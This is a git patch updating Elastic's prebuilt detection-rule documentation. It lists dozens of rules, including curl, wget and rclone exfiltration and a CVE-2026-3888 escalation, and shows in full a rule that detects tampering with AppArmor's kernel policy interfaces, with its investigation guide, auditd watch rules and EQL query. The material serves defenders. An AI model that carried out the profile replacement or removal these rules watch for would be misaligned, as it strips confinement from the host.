From ddc092e9542a16aa5b7a22494919c33fed838eff Mon Sep 17 00:00:00 2001 From: tradebot-elastic <178941316+tradebot-elastic@users.noreply.github.com> Date: Tue, 24 Mar 2026 15:44:11 +0000 Subject: [PATCH] Update latest docs --- ...-apparmor-policy-interface-access.asciidoc | 142 +++++ ...pparmor-policy-violation-detected.asciidoc | 133 +++++ ...e-compilation-via-apparmor-parser.asciidoc | 160 ++++++ ...to-establish-vscode-remote-tunnel.asciidoc | 132 +++++ ...m-uncommon-s3-client-by-rare-user.asciidoc | 141 +++++ ...ws-cloudshell-environment-created.asciidoc | 137 +++++ ...s-by-identity-from-unusual-source.asciidoc | 125 ++++ ...ntication-from-multiple-countries.asciidoc | 149 +++++ ...-by-arc-cluster-credential-access.asciidoc | 136 +++++ ...-component-object-model-hijacking.asciidoc | 215 +++++++ ...n-to-commonly-abused-web-services.asciidoc | 350 ++++++++++++ ...on-a-process-exhibiting-cpu-spike.asciidoc | 174 ++++++ ...-rule-8-19-18-dynamic-linker-copy.asciidoc | 197 +++++++ ...-elastic-agent-service-terminated.asciidoc | 155 +++++ ...-alert-followed-by-telemetry-loss.asciidoc | 131 +++++ ...device-code-grant-by-unusual-user.asciidoc | 163 ++++++ ...9-18-execution-via-openclaw-agent.asciidoc | 133 +++++ ...cessed-sensitive-credential-files.asciidoc | 114 ++++ ...ted-a-launchagent-or-launchdaemon.asciidoc | 114 ++++ ...me-python-spawned-a-shell-on-host.asciidoc | 117 ++++ ...time-seen-dns-query-to-rmm-domain.asciidoc | 219 +++++++ ...te-monitoring-and-management-tool.asciidoc | 540 ++++++++++++++++++ ...in-followed-by-siem-alert-by-user.asciidoc | 105 ++++ ...process-accessing-sensitive-files.asciidoc | 182 ++++++ ...cess-connection-to-unusual-domain.asciidoc | 152 +++++ ...-19-18-ibm-qradar-external-alerts.asciidoc | 115 ++++ ...ingress-transfer-via-windows-bits.asciidoc | 171 ++++++ ...module-load-from-unusual-location.asciidoc | 179 ++++++ ...figmap-access-via-azure-arc-proxy.asciidoc | 141 +++++ ...count-tokenfilter-policy-disabled.asciidoc | 159 ++++++ ...nge-inbox-forwarding-rule-created.asciidoc | 140 +++++ ...arepoint-site-administrator-added.asciidoc | 133 +++++ ...oint-site-sharing-policy-weakened.asciidoc | 142 +++++ ...access-by-unusual-user-and-client.asciidoc | 134 +++++ ...r-impersonation-by-unusual-client.asciidoc | 145 +++++ ...lure-from-the-same-source-address.asciidoc | 175 ++++++ ...agement-tool-vendors-on-same-host.asciidoc | 226 ++++++++ ...-scripts-in-the-startup-directory.asciidoc | 167 ++++++ ...takeover-logon-from-new-source-ip.asciidoc | 113 ++++ ...ccount-takeover-mixed-logon-types.asciidoc | 113 ++++ ...al-data-exfiltration-through-curl.asciidoc | 162 ++++++ ...al-data-exfiltration-through-wget.asciidoc | 167 ++++++ ...tial-data-exfiltration-via-rclone.asciidoc | 117 ++++ ...tential-database-dumping-activity.asciidoc | 150 +++++ ...8-potential-http-downgrade-attack.asciidoc | 113 ++++ ...teral-tool-transfer-via-smb-share.asciidoc | 134 +++++ ...notepad-markdown-rce-exploitation.asciidoc | 118 ++++ ...rotocol-tunneling-via-cloudflared.asciidoc | 114 ++++ ...ntial-protocol-tunneling-via-yuze.asciidoc | 120 ++++ ...ential-remote-install-via-msiexec.asciidoc | 133 +++++ ...lege-escalation-via-cve-2026-3888.asciidoc | 147 +++++ ...8-privileged-accounts-brute-force.asciidoc | 155 +++++ ...-remote-execution-via-file-shares.asciidoc | 162 ++++++ ...8-remote-file-copy-via-teamviewer.asciidoc | 143 +++++ ...mote-file-download-via-powershell.asciidoc | 166 ++++++ ...e-download-via-script-interpreter.asciidoc | 146 +++++ ...t-access-launch-after-msi-install.asciidoc | 123 ++++ ...t-encoded-python-script-execution.asciidoc | 128 +++++ ...ous-javascript-execution-via-deno.asciidoc | 117 ++++ ...ess-access-via-direct-system-call.asciidoc | 162 ++++++ ...-shell-execution-via-velociraptor.asciidoc | 129 +++++ ...-apparmor-policy-management-files.asciidoc | 167 ++++++ ...le-creation-alternate-data-stream.asciidoc | 150 +++++ ...odifying-genai-configuration-file.asciidoc | 146 +++++ ...ver-discovery-or-fuzzing-activity.asciidoc | 142 +++++ ...tential-command-injection-request.asciidoc | 229 ++++++++ ...ial-spike-in-error-response-codes.asciidoc | 148 +++++ ...er-suspicious-user-agent-requests.asciidoc | 175 ++++++ ...-19-18-windows-event-logs-cleared.asciidoc | 115 ++++ .../prebuilt-rules-8-19-18-appendix.asciidoc | 75 +++ .../prebuilt-rules-8-19-18-summary.asciidoc | 150 +++++ ...ebuilt-rules-downloadable-updates.asciidoc | 5 + .../prebuilt-rules-reference.asciidoc | 138 +++-- .../prebuilt-rules/rule-desc-index.asciidoc | 26 +- .../apparmor-policy-interface-access.asciidoc | 142 +++++ ...pparmor-policy-violation-detected.asciidoc | 133 +++++ ...e-compilation-via-apparmor-parser.asciidoc | 160 ++++++ ...to-establish-vscode-remote-tunnel.asciidoc | 9 +- ...m-uncommon-s3-client-by-rare-user.asciidoc | 141 +++++ ...ws-cloudshell-environment-created.asciidoc | 137 +++++ ...s-by-identity-from-unusual-source.asciidoc | 125 ++++ ...ntication-from-multiple-countries.asciidoc | 149 +++++ ...-by-arc-cluster-credential-access.asciidoc | 136 +++++ .../component-object-model-hijacking.asciidoc | 9 +- ...n-to-commonly-abused-web-services.asciidoc | 5 +- ...on-a-process-exhibiting-cpu-spike.asciidoc | 11 +- .../rule-details/dynamic-linker-copy.asciidoc | 13 +- .../elastic-agent-service-terminated.asciidoc | 43 +- ...-alert-followed-by-telemetry-loss.asciidoc | 4 +- .../execution-via-openclaw-agent.asciidoc | 6 +- ...ile-or-directory-deletion-command.asciidoc | 12 +- ...cessed-sensitive-credential-files.asciidoc | 114 ++++ ...ted-a-launchagent-or-launchdaemon.asciidoc | 114 ++++ ...me-python-spawned-a-shell-on-host.asciidoc | 117 ++++ ...time-seen-dns-query-to-rmm-domain.asciidoc | 135 ++++- ...te-monitoring-and-management-tool.asciidoc | 14 +- ...in-followed-by-siem-alert-by-user.asciidoc | 5 +- ...process-accessing-sensitive-files.asciidoc | 5 +- ...cess-connection-to-unusual-domain.asciidoc | 12 +- .../ibm-qradar-external-alerts.asciidoc | 115 ++++ ...ingress-transfer-via-windows-bits.asciidoc | 4 +- ...module-load-from-unusual-location.asciidoc | 12 +- ...figmap-access-via-azure-arc-proxy.asciidoc | 141 +++++ ...count-tokenfilter-policy-disabled.asciidoc | 8 +- ...nge-inbox-forwarding-rule-created.asciidoc | 26 +- ...arepoint-site-administrator-added.asciidoc | 133 +++++ ...access-by-unusual-user-and-client.asciidoc | 34 +- ...r-impersonation-by-unusual-client.asciidoc | 15 +- ...lure-from-the-same-source-address.asciidoc | 14 +- ...agement-tool-vendors-on-same-host.asciidoc | 226 ++++++++ ...-scripts-in-the-startup-directory.asciidoc | 4 +- ...takeover-logon-from-new-source-ip.asciidoc | 18 +- ...ccount-takeover-mixed-logon-types.asciidoc | 18 +- ...al-data-exfiltration-through-curl.asciidoc | 22 +- ...al-data-exfiltration-through-wget.asciidoc | 18 +- ...tial-data-exfiltration-via-rclone.asciidoc | 117 ++++ ...tential-database-dumping-activity.asciidoc | 150 +++++ .../potential-http-downgrade-attack.asciidoc | 4 +- ...teral-tool-transfer-via-smb-share.asciidoc | 8 +- ...notepad-markdown-rce-exploitation.asciidoc | 5 +- ...rotocol-tunneling-via-cloudflared.asciidoc | 114 ++++ ...ntial-protocol-tunneling-via-yuze.asciidoc | 120 ++++ ...ential-remote-install-via-msiexec.asciidoc | 4 +- ...lege-escalation-via-cve-2026-3888.asciidoc | 147 +++++ .../privileged-accounts-brute-force.asciidoc | 155 +++++ .../remote-execution-via-file-shares.asciidoc | 4 +- .../remote-file-copy-via-teamviewer.asciidoc | 4 +- ...mote-file-download-via-powershell.asciidoc | 4 +- ...e-download-via-script-interpreter.asciidoc | 5 +- ...t-access-launch-after-msi-install.asciidoc | 123 ++++ ...t-encoded-python-script-execution.asciidoc | 8 +- ...ous-javascript-execution-via-deno.asciidoc | 117 ++++ ...ess-access-via-direct-system-call.asciidoc | 20 +- ...-shell-execution-via-velociraptor.asciidoc | 129 +++++ ...-apparmor-policy-management-files.asciidoc | 167 ++++++ ...le-creation-alternate-data-stream.asciidoc | 6 +- ...odifying-genai-configuration-file.asciidoc | 12 +- ...ver-discovery-or-fuzzing-activity.asciidoc | 9 +- ...tential-command-injection-request.asciidoc | 9 +- ...ial-spike-in-error-response-codes.asciidoc | 9 +- ...r-potential-sql-injection-request.asciidoc | 4 +- ...er-suspicious-user-agent-requests.asciidoc | 9 +- .../windows-event-logs-cleared.asciidoc | 4 +- docs/index.asciidoc | 2 + 144 files changed, 14925 insertions(+), 244 deletions(-) create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-apparmor-policy-interface-access.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-apparmor-policy-violation-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-apparmor-profile-compilation-via-apparmor-parser.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-attempt-to-establish-vscode-remote-tunnel.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-aws-api-activity-from-uncommon-s3-client-by-rare-user.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-aws-cloudshell-environment-created.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-azure-arc-cluster-credential-access-by-identity-from-unusual-source.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-azure-service-principal-authentication-from-multiple-countries.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-azure-service-principal-sign-in-followed-by-arc-cluster-credential-access.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-component-object-model-hijacking.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-connection-to-commonly-abused-web-services.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-detection-alert-on-a-process-exhibiting-cpu-spike.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-dynamic-linker-copy.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-elastic-agent-service-terminated.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-elastic-defend-alert-followed-by-telemetry-loss.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-entra-id-oauth-device-code-grant-by-unusual-user.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-execution-via-openclaw-agent.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-python-accessed-sensitive-credential-files.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-python-created-a-launchagent-or-launchdaemon.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-python-spawned-a-shell-on-host.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-seen-dns-query-to-rmm-domain.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-seen-remote-monitoring-and-management-tool.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-fortigate-ssl-vpn-login-followed-by-siem-alert-by-user.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-genai-process-accessing-sensitive-files.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-genai-process-connection-to-unusual-domain.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-ibm-qradar-external-alerts.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-ingress-transfer-via-windows-bits.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-kernel-module-load-from-unusual-location.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-kubernetes-secret-or-configmap-access-via-azure-arc-proxy.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-local-account-tokenfilter-policy-disabled.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-m365-exchange-inbox-forwarding-rule-created.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-m365-sharepoint-site-administrator-added.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-m365-sharepoint-site-sharing-policy-weakened.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-microsoft-graph-request-email-access-by-unusual-user-and-client.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-microsoft-graph-request-user-impersonation-by-unusual-client.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-multiple-logon-failure-from-the-same-source-address.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-multiple-remote-management-tool-vendors-on-same-host.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-persistent-scripts-in-the-startup-directory.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-account-takeover-logon-from-new-source-ip.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-account-takeover-mixed-logon-types.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-data-exfiltration-through-curl.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-data-exfiltration-through-wget.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-data-exfiltration-via-rclone.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-database-dumping-activity.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-http-downgrade-attack.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-lateral-tool-transfer-via-smb-share.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-notepad-markdown-rce-exploitation.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-protocol-tunneling-via-cloudflared.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-protocol-tunneling-via-yuze.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-remote-install-via-msiexec.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-snap-confine-privilege-escalation-via-cve-2026-3888.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-privileged-accounts-brute-force.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-execution-via-file-shares.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-file-copy-via-teamviewer.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-file-download-via-powershell.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-file-download-via-script-interpreter.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-management-access-launch-after-msi-install.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-rot-encoded-python-script-execution.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-suspicious-javascript-execution-via-deno.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-suspicious-process-access-via-direct-system-call.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-suspicious-shell-execution-via-velociraptor.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-suspicious-write-attempt-to-apparmor-policy-management-files.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-unusual-file-creation-alternate-data-stream.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-unusual-process-modifying-genai-configuration-file.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-web-server-discovery-or-fuzzing-activity.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-web-server-potential-command-injection-request.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-web-server-potential-spike-in-error-response-codes.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-web-server-suspicious-user-agent-requests.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-windows-event-logs-cleared.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rules-8-19-18-appendix.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rules-8-19-18-summary.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/apparmor-policy-interface-access.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/apparmor-policy-violation-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/apparmor-profile-compilation-via-apparmor-parser.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/aws-api-activity-from-uncommon-s3-client-by-rare-user.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/aws-cloudshell-environment-created.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/azure-arc-cluster-credential-access-by-identity-from-unusual-source.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/azure-service-principal-authentication-from-multiple-countries.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/azure-service-principal-sign-in-followed-by-arc-cluster-credential-access.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/first-time-python-accessed-sensitive-credential-files.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/first-time-python-created-a-launchagent-or-launchdaemon.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/first-time-python-spawned-a-shell-on-host.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/ibm-qradar-external-alerts.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/kubernetes-secret-or-configmap-access-via-azure-arc-proxy.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/m365-sharepoint-site-administrator-added.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/multiple-remote-management-tool-vendors-on-same-host.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-data-exfiltration-via-rclone.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-database-dumping-activity.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-protocol-tunneling-via-cloudflared.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-protocol-tunneling-via-yuze.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-snap-confine-privilege-escalation-via-cve-2026-3888.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/privileged-accounts-brute-force.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/remote-management-access-launch-after-msi-install.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/suspicious-javascript-execution-via-deno.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/suspicious-shell-execution-via-velociraptor.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/suspicious-write-attempt-to-apparmor-policy-management-files.asciidoc diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-apparmor-policy-interface-access.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-apparmor-policy-interface-access.asciidoc new file mode 100644 index 0000000000..fedee767a8 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-apparmor-policy-interface-access.asciidoc @@ -0,0 +1,142 @@ +[[prebuilt-rule-8-19-18-apparmor-policy-interface-access]] +=== AppArmor Policy Interface Access + +Identifies access to AppArmor kernel policy control interfaces through the .load, .replace, or .remove files under /sys/kernel/security/apparmor/. These special files are used to load, modify, or remove AppArmor profiles and are rarely accessed during normal system activity outside of policy administration. Reads or writes to these interfaces may indicate legitimate security configuration changes, but can also reflect defense evasion, unauthorized policy tampering, or the installation of attacker-controlled profiles. This detection is especially valuable on systems where AppArmor policy changes are uncommon or tightly controlled. + +*Rule type*: eql + +*Rule indices*: + +* logs-auditd_manager.auditd-* +* auditbeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://cdn2.qualys.com/advisory/2026/03/10/crack-armor.txt +* https://blog.qualys.com/vulnerabilities-threat-research/2026/03/12/crackarmor-critical-apparmor-flaws-enable-local-privilege-escalation-to-root + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Auditd Manager +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating AppArmor Policy Interface Access* + + +This rule detects reads, writes, or deletions against the Linux AppArmor policy control files that load, replace, or remove profiles, actions that directly change how the kernel restricts processes. That matters because unauthorized access to these interfaces can disable enforcement or install permissive rules that hide malicious activity; for example, an intruder with elevated privileges might replace a profile protecting a web server so a dropped backdoor can run and touch sensitive files without confinement. + + +*Possible investigation steps* + + +- Determine whether the access coincides with an approved AppArmor administration task by validating the initiating account, privilege escalation history, maintenance windows, and any related change or deployment records for the host. +- Review the full execution lineage around the event to confirm whether the interface was touched by expected policy management activity such as package updates or configuration automation versus an interactive shell, ad hoc script, or remote session. +- Inspect recent changes to AppArmor profile files and deployment artifacts under standard policy locations to identify which profile was loaded, replaced, or removed and whether the resulting policy became weaker or disabled confinement for sensitive services. +- Correlate the activity with nearby authentication, sudo, process execution, and network events on the same system to assess whether the policy modification was part of normal administration or followed potentially malicious hands-on-keyboard behavior. +- If the change is not authorized, preserve the modified policy artifacts and relevant host evidence, then restore known-good AppArmor profiles from a trusted source and verify enforcement is active to prevent further defense evasion. + + +*False positive analysis* + + +- Approved system maintenance such as package updates, service installation, or boot-time policy initialization can legitimately access AppArmor `.load` or `.replace`, so verify the parent process and command line map to expected package management or startup activity during a documented change window. +- An administrator may manually reload, replace, or remove an AppArmor profile while troubleshooting or deploying a local service, so confirm the initiating user, any `sudo` or privileged session history, and recent edits to AppArmor profile files align with an authorized operational task. + + +*Response and remediation* + + +- Isolate the affected Linux host from the network while preserving forensic access, terminate the process or shell session that wrote to `/sys/kernel/security/apparmor/.load`, `.replace`, or `.remove`, and disable the originating account’s privileged access until the scope is understood. +- Collect and review the active AppArmor state and on-disk profiles from `/etc/apparmor.d/`, recent shell history, sudo activity, and any scripts or package hooks involved, then remove attacker-added profiles and reverse any profile changes that weakened or removed confinement. +- Hunt for and delete persistence that relied on the AppArmor change, including malicious systemd units, cron entries, startup scripts, modified container launch settings, or dropped binaries that were able to run only after the profile was replaced or removed. +- Restore the system to a known-good state by reinstalling trusted AppArmor policy packages or redeploying validated profiles from source control, reloading them with approved tools, and rebuilding the host from a clean image if root access or core security files were modified. +- Escalate to incident response immediately if the tampered profile protected an internet-facing service, credential store, or security tool, if the same behavior is seen on multiple hosts, or if the attacker also changed sudoers, SSH access, or other local security controls. +- Harden the environment by restricting who can administer AppArmor, requiring signed or change-controlled profile updates, alerting on future writes to the AppArmor policy interfaces, and validating that critical services remain in enforce mode after patching or deployment. + +==== Setup + + + +*Setup* + + +This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. +``` +Kibana --> +Management --> +Integrations --> +Auditd Manager --> +Add Auditd Manager +``` +`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the "audit rules" configuration box or the "auditd rule files" box by specifying a file to read the audit rules from. +For this detection rule to trigger, the following additional audit rules are required to be added to the integration: +``` +-w /sys/kernel/security/apparmor/.load -p rw -k apparmor_policy_change +-w /sys/kernel/security/apparmor/.replace -p rw -k apparmor_policy_change +-w /sys/kernel/security/apparmor/.remove -p rw -k apparmor_policy_change +``` +Add the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable. + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "linux" and event.action in ("opened-file", "wrote-to-file", "deleted") and +file.path in ( + "/sys/kernel/security/apparmor/.load", ".load", + "/sys/kernel/security/apparmor/.replace", ".replace", + "/sys/kernel/security/apparmor/.remove", ".remove" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-apparmor-policy-violation-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-apparmor-policy-violation-detected.asciidoc new file mode 100644 index 0000000000..424c18bddc --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-apparmor-policy-violation-detected.asciidoc @@ -0,0 +1,133 @@ +[[prebuilt-rule-8-19-18-apparmor-policy-violation-detected]] +=== AppArmor Policy Violation Detected + +Identifies events where the AppArmor security module blocked or restricted an operation due to a policy violation. AppArmor enforces mandatory access control policies that limit how processes interact with system resources such as files, network sockets, and capabilities. When a process attempts an action that is not permitted by the active profile, the kernel generates a policy violation event. While these events can occur during normal operation or misconfiguration, they may also indicate attempted privilege escalation, restricted file access, or malicious activity being prevented by the system's security policy. + +*Rule type*: eql + +*Rule indices*: + +* logs-auditd_manager.auditd-* +* auditbeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://cdn2.qualys.com/advisory/2026/03/10/crack-armor.txt +* https://blog.qualys.com/vulnerabilities-threat-research/2026/03/12/crackarmor-critical-apparmor-flaws-enable-local-privilege-escalation-to-root + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Auditd Manager +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + 